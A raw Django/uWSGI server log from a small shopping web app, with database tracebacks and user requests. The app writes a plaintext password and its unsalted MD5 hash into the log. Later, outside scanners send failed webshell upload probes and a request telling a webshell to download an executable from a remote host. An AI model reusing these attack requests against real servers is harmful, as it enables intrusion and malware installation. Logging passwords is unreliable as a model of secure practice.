  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 837, in save_base
    updated = self._save_table(raw, cls, force_insert, force_update, using, update_fields)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 923, in _save_table
    result = self._do_insert(cls._base_manager, using, fields, update_pk, raw)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/base.py", line 962, in _do_insert
    using=using, raw=raw)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 1076, in _insert
    return query.get_compiler(using=using).execute_sql(return_id)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/sql/compiler.py", line 1107, in execute_sql
    cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 80, in execute
    return super(CursorDebugWrapper, self).execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/utils.py", line 94, in __exit__
    six.reraise(dj_exc_type, dj_exc_value, traceback)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/utils/six.py", line 685, in reraise
    raise value.with_traceback(tb)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/utils.py", line 65, in execute
    return self.cursor.execute(sql, params)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/backends/mysql/base.py", line 101, in execute
    return self.cursor.execute(query, args)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 170, in execute
    result = self._query(query)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/cursors.py", line 328, in _query
    conn.query(q)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 517, in query
    self._affected_rows = self._read_query_result(unbuffered=unbuffered)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 732, in _read_query_result
    result.read()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 1075, in read
    first_packet = self.connection._read_packet()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/connections.py", line 684, in _read_packet
    packet.check_error()
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/protocol.py", line 220, in check_error
    err.raise_mysql_exception(self._data)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/pymysql/err.py", line 109, in raise_mysql_exception
    raise errorclass(errno, errval)
django.db.utils.ProgrammingError: (1146, "Table 'axf.axf_order' doesn't exist")
[pid: 26361|app: 0|req: 55/55] 113.88.14.120 () {44 vars in 898 bytes} [Wed Mar 13 11:53:17 2019] GET /axf/genenateorder/ => generated 198319 bytes in 108 msecs (HTTP/1.1 500) 4 headers in 130 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 56/56] 113.88.14.120 () {46 vars in 901 bytes} [Wed Mar 13 12:00:32 2019] GET /axf/ => generated 22501 bytes in 30 msecs (HTTP/1.1 200) 5 headers in 179 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 57/57] 113.88.14.120 () {44 vars in 875 bytes} [Wed Mar 13 12:00:34 2019] GET /axf/mine/ => generated 5013 bytes in 11 msecs (HTTP/1.1 200) 4 headers in 195 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 58/58] 113.88.14.120 () {44 vars in 831 bytes} [Wed Mar 13 12:00:38 2019] GET /axf/cart/ => generated 942 bytes in 4 msecs (HTTP/1.1 200) 4 headers in 123 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 59/59] 113.88.14.120 () {44 vars in 838 bytes} [Wed Mar 13 12:00:39 2019] GET /axf/login/ => generated 1906 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 1)
123
[pid: 26361|app: 0|req: 60/60] 113.88.14.120 () {52 vars in 1023 bytes} [Wed Mar 13 12:00:44 2019] POST /axf/login/ => generated 0 bytes in 9 msecs (HTTP/1.1 302) 6 headers in 277 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 61/61] 113.88.14.120 () {46 vars in 912 bytes} [Wed Mar 13 12:00:44 2019] GET /axf/mine/ => generated 5079 bytes in 9 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 62/62] 113.88.14.120 () {44 vars in 880 bytes} [Wed Mar 13 12:00:46 2019] GET /axf/cart/ => generated 3245 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 63/63] 113.88.14.120 () {44 vars in 884 bytes} [Wed Mar 13 12:00:47 2019] GET /axf/market/ => generated 10978 bytes in 19 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 64/64] 113.88.14.120 () {44 vars in 833 bytes} [Wed Mar 13 12:00:49 2019] GET /axf/addcart/?goodsid=984 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 65/65] 113.88.14.120 () {44 vars in 833 bytes} [Wed Mar 13 12:00:50 2019] GET /axf/addcart/?goodsid=985 => generated 73 bytes in 17 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 66/66] 113.88.14.120 () {44 vars in 882 bytes} [Wed Mar 13 12:00:51 2019] GET /axf/cart/ => generated 4970 bytes in 16 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 67/67] 113.88.14.120 () {44 vars in 898 bytes} [Wed Mar 13 12:00:52 2019] GET /axf/genenateorder/ => generated 1180 bytes in 40 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 68/68] 113.88.14.120 () {44 vars in 880 bytes} [Wed Mar 13 12:00:57 2019] GET /axf/mine/ => generated 5079 bytes in 9 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 69/69] 113.88.14.120 () {44 vars in 890 bytes} [Wed Mar 13 12:00:58 2019] GET /axf/orderlist/ => generated 3403 bytes in 11 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 70/70] 113.88.14.120 () {44 vars in 945 bytes} [Wed Mar 13 12:01:00 2019] GET /axf/orderdetail/1552466539048039716240/ => generated 1059 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 71/71] 113.88.14.120 () {44 vars in 947 bytes} [Wed Mar 13 12:01:02 2019] GET /axf/orderdetail/15524665400325314316980/ => generated 1060 bytes in 11 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 72/72] 113.88.14.120 () {44 vars in 947 bytes} [Wed Mar 13 12:01:04 2019] GET /axf/orderdetail/15524665670309368478195/ => generated 2137 bytes in 35 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 73/73] 113.88.14.120 () {44 vars in 947 bytes} [Wed Mar 13 12:01:09 2019] GET /axf/orderdetail/15524662950359498598186/ => generated 1274 bytes in 21 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 74/74] 113.88.14.120 () {44 vars in 945 bytes} [Wed Mar 13 12:01:12 2019] GET /axf/orderdetail/1552478452062972491747/ => generated 1271 bytes in 14 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 75/75] 113.88.14.120 () {44 vars in 884 bytes} [Wed Mar 13 12:01:18 2019] GET /axf/logout/ => generated 0 bytes in 10 msecs (HTTP/1.1 302) 5 headers in 217 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 76/76] 113.88.14.120 () {44 vars in 836 bytes} [Wed Mar 13 12:01:18 2019] GET /axf/mine/ => generated 5013 bytes in 6 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
Internal Server Error: /axf/orderlist/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 357, in orderlist
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26361|app: 0|req: 77/77] 113.88.14.120 () {44 vars in 846 bytes} [Wed Mar 13 12:01:19 2019] GET /axf/orderlist/ => generated 68158 bytes in 41 msecs (HTTP/1.1 500) 4 headers in 129 bytes (1 switches on core 1)
Internal Server Error: /axf/orderlist/
Traceback (most recent call last):
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/exception.py", line 41, in inner
    response = get_response(request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 187, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/core/handlers/base.py", line 185, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "./app/views.py", line 357, in orderlist
    user = User.objects.get(pk=userid)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
  File "/root/.virtualenv/axf/lib/python3.5/site-packages/django/db/models/query.py", line 380, in get
    self.model._meta.object_name
app.models.DoesNotExist: User matching query does not exist.
[pid: 26361|app: 0|req: 78/78] 113.88.14.120 () {44 vars in 846 bytes} [Wed Mar 13 12:02:07 2019] GET /axf/orderlist/ => generated 68158 bytes in 43 msecs (HTTP/1.1 500) 4 headers in 129 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 79/79] 113.88.14.120 () {44 vars in 844 bytes} [Wed Mar 13 12:05:07 2019] GET /axf/register/ => generated 3525 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 80/80] 113.88.14.120 () {44 vars in 840 bytes} [Wed Mar 13 12:05:08 2019] GET /axf/mine/ => generated 5013 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 81/81] 113.88.14.120 () {44 vars in 836 bytes} [Wed Mar 13 12:05:10 2019] GET /axf/mine/ => generated 5013 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 82/82] 113.88.14.120 () {44 vars in 835 bytes} [Wed Mar 13 12:05:15 2019] GET /axf/market/ => generated 10768 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 83/83] 113.88.14.120 () {44 vars in 838 bytes} [Wed Mar 13 12:05:15 2019] GET /axf/mine/ => generated 5013 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 84/84] 113.88.14.120 () {44 vars in 844 bytes} [Wed Mar 13 12:05:17 2019] GET /axf/register/ => generated 3525 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 85/85] 113.88.14.120 () {44 vars in 840 bytes} [Wed Mar 13 12:05:19 2019] GET /axf/mine/ => generated 5013 bytes in 5 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 86/86] 113.88.14.120 () {44 vars in 844 bytes} [Wed Mar 13 12:05:21 2019] GET /axf/register/ => generated 3525 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 278 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 87/87] 113.88.14.120 () {44 vars in 811 bytes} [Wed Mar 13 12:05:36 2019] GET /axf/checkemail/?email=111%40qq.com => generated 60 bytes in 3 msecs (HTTP/1.1 200) 3 headers in 100 bytes (1 switches on core 1)
202cb962ac59075b964b07152d234b70
[pid: 26361|app: 0|req: 88/88] 113.88.14.120 () {52 vars in 1032 bytes} [Wed Mar 13 12:05:38 2019] POST /axf/register/ => generated 0 bytes in 20 msecs (HTTP/1.1 302) 6 headers in 277 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 89/89] 113.88.14.120 () {46 vars in 915 bytes} [Wed Mar 13 12:05:38 2019] GET /axf/mine/ => generated 5079 bytes in 9 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 90/90] 113.88.14.120 () {44 vars in 884 bytes} [Wed Mar 13 12:05:40 2019] GET /axf/market/ => generated 10768 bytes in 20 msecs (HTTP/1.1 200) 4 headers in 125 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 91/91] 113.88.14.120 () {44 vars in 833 bytes} [Wed Mar 13 12:05:41 2019] GET /axf/addcart/?goodsid=984 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 92/92] 113.88.14.120 () {44 vars in 833 bytes} [Wed Mar 13 12:05:41 2019] GET /axf/addcart/?goodsid=983 => generated 73 bytes in 24 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 93/93] 113.88.14.120 () {44 vars in 833 bytes} [Wed Mar 13 12:05:42 2019] GET /axf/addcart/?goodsid=985 => generated 73 bytes in 12 msecs (HTTP/1.1 200) 4 headers in 114 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 94/94] 113.88.14.120 () {44 vars in 882 bytes} [Wed Mar 13 12:05:44 2019] GET /axf/cart/ => generated 4989 bytes in 16 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 95/95] 113.88.14.120 () {44 vars in 898 bytes} [Wed Mar 13 12:05:45 2019] GET /axf/genenateorder/ => generated 1267 bytes in 59 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 96/96] 113.88.14.120 () {44 vars in 880 bytes} [Wed Mar 13 12:05:49 2019] GET /axf/mine/ => generated 5079 bytes in 10 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
[pid: 26361|app: 0|req: 97/97] 113.88.14.120 () {44 vars in 890 bytes} [Wed Mar 13 12:05:51 2019] GET /axf/orderlist/ => generated 1183 bytes in 10 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 1)
[pid: 26361|app: 0|req: 98/98] 113.88.14.120 () {44 vars in 947 bytes} [Wed Mar 13 12:05:52 2019] GET /axf/orderdetail/15524787450325936677341/ => generated 1374 bytes in 15 msecs (HTTP/1.1 200) 4 headers in 124 bytes (1 switches on core 0)
Not Found: /cache/global/img/gs.gif
[pid: 26361|app: 0|req: 99/99] 80.82.70.187 () {32 vars in 414 bytes} [Wed Mar 13 12:10:57 2019] GET /cache/global/img/gs.gif => generated 2099 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 100/100] 54.215.143.233 () {38 vars in 492 bytes} [Wed Mar 13 12:20:41 2019] GET / => generated 2013 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /data/cache/style_9_common.css
[pid: 26361|app: 0|req: 101/101] 66.249.79.235 () {44 vars in 1048 bytes} [Wed Mar 13 12:22:07 2019] GET /data/cache/style_9_common.css?A0T => generated 2119 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /home.php
[pid: 26361|app: 0|req: 102/102] 66.249.79.235 () {44 vars in 1057 bytes} [Wed Mar 13 12:22:09 2019] GET /home.php?mod=misc&ac=sendmail&rand=1547268376 => generated 2097 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.js
[pid: 26361|app: 0|req: 103/103] 66.249.79.239 () {44 vars in 1032 bytes} [Wed Mar 13 12:22:10 2019] GET /template/qu_zuk/img/js/jquery.js => generated 2124 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /template/qu_zuk/img/js/jquery.forum.js
[pid: 26361|app: 0|req: 104/104] 66.249.79.235 () {44 vars in 1044 bytes} [Wed Mar 13 12:22:10 2019] GET /template/qu_zuk/img/js/jquery.forum.js => generated 2142 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.SuperSlide.js
[pid: 26361|app: 0|req: 105/105] 66.249.79.237 () {44 vars in 1054 bytes} [Wed Mar 13 12:22:12 2019] GET /template/qu_zuk/img/js/jquery.SuperSlide.js => generated 2157 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /source/plugin/qu_forumimglist/images/jquery-1.11.0.min.js
[pid: 26361|app: 0|req: 106/106] 66.249.79.235 () {44 vars in 1082 bytes} [Wed Mar 13 12:22:13 2019] GET /source/plugin/qu_forumimglist/images/jquery-1.11.0.min.js => generated 2199 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /source/plugin/qu_forumimglist/images/lightbox.css
[pid: 26361|app: 0|req: 107/107] 66.249.79.235 () {44 vars in 1081 bytes} [Wed Mar 13 12:22:13 2019] GET /source/plugin/qu_forumimglist/images/lightbox.css => generated 2175 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /source/plugin/qu_forumimglist/images/style.css
[pid: 26361|app: 0|req: 108/108] 66.249.79.237 () {44 vars in 1075 bytes} [Wed Mar 13 12:22:15 2019] GET /source/plugin/qu_forumimglist/images/style.css => generated 2166 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /source/plugin/qu_forumimglist/images/lightbox.js
[pid: 26361|app: 0|req: 109/109] 66.249.79.235 () {44 vars in 1064 bytes} [Wed Mar 13 12:22:16 2019] GET /source/plugin/qu_forumimglist/images/lightbox.js => generated 2172 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 110/110] 134.49.247.27 () {32 vars in 445 bytes} [Wed Mar 13 12:24:44 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /acadmin.php
[pid: 26361|app: 0|req: 111/111] 198.167.223.52 () {36 vars in 579 bytes} [Wed Mar 13 12:27:01 2019] GET /acadmin.php => generated 2064 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 112/112] 47.92.54.139 () {34 vars in 460 bytes} [Wed Mar 13 14:05:42 2019] GET / => generated 2013 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /FxCodeShell.jsp 
[pid: 26361|app: 0|req: 113/113] 47.107.209.70 () {42 vars in 629 bytes} [Wed Mar 13 14:09:12 2019] PUT /FxCodeShell.jsp%20 => generated 2081 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /FxCodeShell.jsp::$DATA
[pid: 26361|app: 0|req: 114/114] 47.107.209.70 () {42 vars in 643 bytes} [Wed Mar 13 14:09:12 2019] PUT /FxCodeShell.jsp::$DATA => generated 2097 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /FxCodeShell.jsp/
[pid: 26361|app: 0|req: 115/115] 47.107.209.70 () {42 vars in 625 bytes} [Wed Mar 13 14:09:12 2019] PUT /FxCodeShell.jsp/ => generated 2079 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /FxCodeShell.jsp
[pid: 26361|app: 0|req: 116/116] 47.107.209.70 () {38 vars in 735 bytes} [Wed Mar 13 14:09:12 2019] GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe => generated 2156 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 117/117] 54.218.104.204 () {32 vars in 352 bytes} [Wed Mar 13 14:16:12 2019] GET / => generated 2010 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 118/118] 109.175.11.240 () {32 vars in 446 bytes} [Wed Mar 13 14:43:32 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 119/119] 187.192.34.215 () {32 vars in 446 bytes} [Wed Mar 13 15:22:30 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 120/120] 47.101.203.29 () {34 vars in 461 bytes} [Wed Mar 13 15:27:32 2019] GET / => generated 2013 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /azenv.php
[pid: 26361|app: 0|req: 121/121] 95.213.177.125 () {40 vars in 687 bytes} [Wed Mar 13 15:35:41 2019] POST /azenv.php?auth=155249134043&a=PSCN&i=795580870&p=80 => generated 2119 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
[pid: 26361|app: 0|req: 122/122] 93.113.125.89 () {30 vars in 325 bytes} [Wed Mar 13 15:53:08 2019] GET / => generated 55446 bytes in 34 msecs (HTTP/1.0 400) 1 headers in 53 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 123/123] 163.177.13.2 () {32 vars in 425 bytes} [Wed Mar 13 16:09:47 2019] HEAD / => generated 2011 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 124/124] 47.110.146.179 () {34 vars in 420 bytes} [Wed Mar 13 16:12:16 2019] GET / => generated 2014 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 125/125] 168.121.123.102 () {32 vars in 448 bytes} [Wed Mar 13 16:21:10 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /forum.php
[pid: 26361|app: 0|req: 126/126] 203.208.60.45 () {38 vars in 673 bytes} [Wed Mar 13 16:35:45 2019] GET /forum.php?mod=forumdisplay&fid=38&filter=digest&digest=1 => generated 2114 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /data/cache/style_9_common.css
[pid: 26361|app: 0|req: 127/127] 203.208.60.34 () {44 vars in 1040 bytes} [Wed Mar 13 16:35:49 2019] GET /data/cache/style_9_common.css?A0T => generated 2119 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /source/plugin/qu_forumimglist/images/lightbox.css
[pid: 26361|app: 0|req: 128/128] 203.208.60.108 () {44 vars in 1074 bytes} [Wed Mar 13 16:35:49 2019] GET /source/plugin/qu_forumimglist/images/lightbox.css => generated 2175 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.forum.js
[pid: 26361|app: 0|req: 129/129] 203.208.60.102 () {44 vars in 1037 bytes} [Wed Mar 13 16:35:50 2019] GET /template/qu_zuk/img/js/jquery.forum.js => generated 2142 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /template/qu_zuk/img/js/jquery.js
[pid: 26361|app: 0|req: 130/130] 203.208.60.108 () {44 vars in 1025 bytes} [Wed Mar 13 16:35:50 2019] GET /template/qu_zuk/img/js/jquery.js => generated 2124 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /source/plugin/qu_forumimglist/images/style.css
[pid: 26361|app: 0|req: 131/131] 203.208.60.76 () {44 vars in 1067 bytes} [Wed Mar 13 16:35:51 2019] GET /source/plugin/qu_forumimglist/images/style.css => generated 2166 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /home.php
[pid: 26361|app: 0|req: 132/132] 203.208.60.8 () {44 vars in 1048 bytes} [Wed Mar 13 16:35:52 2019] GET /home.php?mod=misc&ac=sendmail&rand=1547330675 => generated 2097 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /source/plugin/qu_forumimglist/images/lightbox.js
[pid: 26361|app: 0|req: 133/133] 203.208.60.101 () {44 vars in 1057 bytes} [Wed Mar 13 16:35:53 2019] GET /source/plugin/qu_forumimglist/images/lightbox.js => generated 2172 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /source/plugin/qu_forumimglist/images/jquery-1.11.0.min.js
[pid: 26361|app: 0|req: 134/134] 203.208.60.90 () {44 vars in 1074 bytes} [Wed Mar 13 16:35:53 2019] GET /source/plugin/qu_forumimglist/images/jquery-1.11.0.min.js => generated 2199 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /data/cache/style_9_forum_forumdisplay.css
[pid: 26361|app: 0|req: 135/135] 203.208.60.57 () {44 vars in 1064 bytes} [Wed Mar 13 16:35:54 2019] GET /data/cache/style_9_forum_forumdisplay.css?A0T => generated 2155 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /template/qu_zuk/img/js/jquery.SuperSlide.js
[pid: 26361|app: 0|req: 136/136] 203.208.60.56 () {44 vars in 1046 bytes} [Wed Mar 13 16:35:54 2019] GET /template/qu_zuk/img/js/jquery.SuperSlide.js => generated 2157 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /template/qu_zuk/img/js/jquery.SuperSlide.js
[pid: 26361|app: 0|req: 137/137] 203.208.60.27 () {44 vars in 1046 bytes} [Wed Mar 13 16:35:55 2019] GET /template/qu_zuk/img/js/jquery.SuperSlide.js => generated 2157 bytes in 5 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 138/138] 14.215.176.20 () {40 vars in 601 bytes} [Wed Mar 13 17:03:16 2019] GET / => generated 2010 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 139/139] 52.53.201.78 () {34 vars in 475 bytes} [Wed Mar 13 17:38:06 2019] GET / => generated 2014 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
[pid: 26361|app: 0|req: 140/140] 72.36.89.14 () {34 vars in 370 bytes} [Wed Mar 13 17:45:45 2019] GET / => generated 2010 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /robots.txt
[pid: 26361|app: 0|req: 141/141] 203.208.60.32 () {36 vars in 504 bytes} [Wed Mar 13 17:49:36 2019] GET /robots.txt => generated 2058 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /data/cache/style_9_forum_viewthread.css
[pid: 26361|app: 0|req: 142/142] 203.208.60.52 () {44 vars in 1022 bytes} [Wed Mar 13 17:49:36 2019] GET /data/cache/style_9_forum_viewthread.css?A0T => generated 2149 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /home.php
[pid: 26361|app: 0|req: 143/143] 203.208.60.11 () {44 vars in 1011 bytes} [Wed Mar 13 17:49:43 2019] GET /home.php?mod=misc&ac=sendmail&rand=1547330734 => generated 2097 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /home.php
[pid: 26361|app: 0|req: 144/144] 203.208.60.47 () {44 vars in 1011 bytes} [Wed Mar 13 17:49:44 2019] GET /home.php?mod=misc&ac=sendmail&rand=1547330734 => generated 2097 bytes in 4 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 0)
Not Found: /
[pid: 26361|app: 0|req: 145/145] 201.124.165.0 () {32 vars in 446 bytes} [Wed Mar 13 19:25:46 2019] GET / => generated 2016 bytes in 3 msecs (HTTP/1.1 404) 3 headers in 102 bytes (1 switches on core 1)
Not Found: /
